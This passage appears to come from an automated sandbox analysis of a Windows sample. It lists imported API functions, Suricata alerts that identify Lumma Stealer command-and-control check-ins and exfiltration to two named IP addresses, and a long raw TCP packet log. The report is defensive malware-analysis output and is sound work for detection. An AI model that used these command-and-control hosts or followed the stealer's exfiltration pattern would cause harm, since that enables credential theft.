                                                                                                                                          user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                          msimg32.dllAlphaBlend
                                                                                                                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                          version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                          mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                          kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                          advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                          comctl32.dllInitCommonControls
                                                                                                                                          kernel32.dllSleep
                                                                                                                                          oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                          comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                          shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                          shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                          comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                          ole32.dllCoDisconnectObject
                                                                                                                                          advapi32.dllAdjustTokenPrivileges
                                                                                                                                          oleaut32.dllSysFreeString

                                                                                                                                          Possible Origin

                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                          EnglishUnited States

                                                                                                                                          Network Behavior

                                                                                                                                          Suricata IDS Alerts

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2024-12-25T22:17:12.751979+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:13.528341+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:13.528341+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:14.752659+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:15.500846+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:15.500846+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:16.911417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:17.904222+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:19.240090+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:21.583075+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:24.187670+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:26.263533+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:28.331819+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:29.105041+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743104.21.89.250443TCP
                                                                                                                                          2024-12-25T22:17:31.032314+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.214.186443TCP
                                                                                                                                          2024-12-25T22:17:31.931874+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.214.186443192.168.2.449744TCP

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 25, 2024 22:17:11.528378963 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:11.528414965 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:11.528647900 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:11.531486988 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:11.531503916 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:12.751866102 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:12.751979113 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:12.755182028 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:12.755191088 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:12.755439043 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:12.803013086 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:12.820440054 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:12.820472956 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:12.820555925 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:13.528335094 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:13.528414965 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:13.528506994 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:13.530910969 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:13.530927896 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:13.531090975 CET49730443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:13.531096935 CET44349730104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:13.540467978 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:13.540560961 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:13.540673018 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:13.540924072 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:13.540961027 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:14.752545118 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:14.752659082 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:14.753895998 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:14.753910065 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:14.754146099 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:14.755253077 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:14.755275011 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:14.755331039 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500683069 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500724077 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500750065 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500775099 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500797987 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500823975 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.500916004 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.500962019 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.508649111 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.508716106 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.508737087 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.516957045 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.517015934 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.517033100 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.529567957 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.529679060 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.529755116 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.529927015 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.529963970 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.529989958 CET49731443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.530008078 CET44349731104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.696865082 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.696964025 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:15.697072029 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.697439909 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:15.697494984 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:16.911298990 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:16.911417007 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:16.913033009 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:16.913089037 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:16.913360119 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:16.914885044 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:16.914997101 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:16.915039062 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:16.915277958 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:16.915359974 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:17.904220104 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:17.904320002 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:17.904439926 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:17.904547930 CET49732443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:17.904618025 CET44349732104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:18.026552916 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:18.026586056 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:18.026659966 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:18.026932001 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:18.026943922 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:19.240015030 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:19.240089893 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:19.241703033 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:19.241713047 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:19.241913080 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:19.243125916 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:19.243125916 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:19.243156910 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:20.102796078 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:20.102876902 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:20.103070021 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:20.103218079 CET49733443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:20.103230000 CET44349733104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:20.370861053 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:20.370906115 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:20.370971918 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:20.371300936 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:20.371319056 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:21.582854986 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:21.583075047 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:21.665879965 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:21.665904999 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:21.666212082 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:21.673634052 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:21.673762083 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:21.673791885 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:21.674310923 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:21.674319029 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:22.607618093 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:22.607703924 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:22.607748032 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:22.607922077 CET49736443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:22.607938051 CET44349736104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:22.975873947 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:22.975972891 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:22.976059914 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:22.976609945 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:22.976646900 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.187558889 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.187669992 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:24.188891888 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:24.188920975 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.189186096 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.196341038 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:24.196619034 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:24.196633101 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.942013025 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.942137957 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:24.942205906 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:24.944128990 CET49739443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:24.944171906 CET44349739104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:25.051368952 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:25.051426888 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:25.051493883 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:25.051801920 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:25.051815033 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:26.263468981 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:26.263533115 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:26.264880896 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:26.264892101 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:26.265120983 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:26.271763086 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:26.271888018 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:26.271893024 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:27.096306086 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:27.096415997 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:27.098467112 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:27.115657091 CET49741443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:27.115686893 CET44349741104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:27.117237091 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:27.117266893 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:27.119776011 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:27.120255947 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:27.120265007 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:28.331753969 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:28.331819057 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:28.333441973 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:28.333451033 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:28.333673000 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:28.342658043 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:28.342695951 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:28.342724085 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.104780912 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.104866028 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.104974985 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:29.105148077 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:29.105168104 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.105178118 CET49743443192.168.2.4104.21.89.250
                                                                                                                                          Dec 25, 2024 22:17:29.105182886 CET44349743104.21.89.250192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.787131071 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:29.787220955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.787329912 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:29.787775040 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:29.787811041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:31.032229900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:31.032314062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:31.040210962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:31.040236950 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:31.040585041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:31.059596062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:31.103375912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:31.660733938 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:31.660870075 CET44349744172.67.214.186192.168.2.4
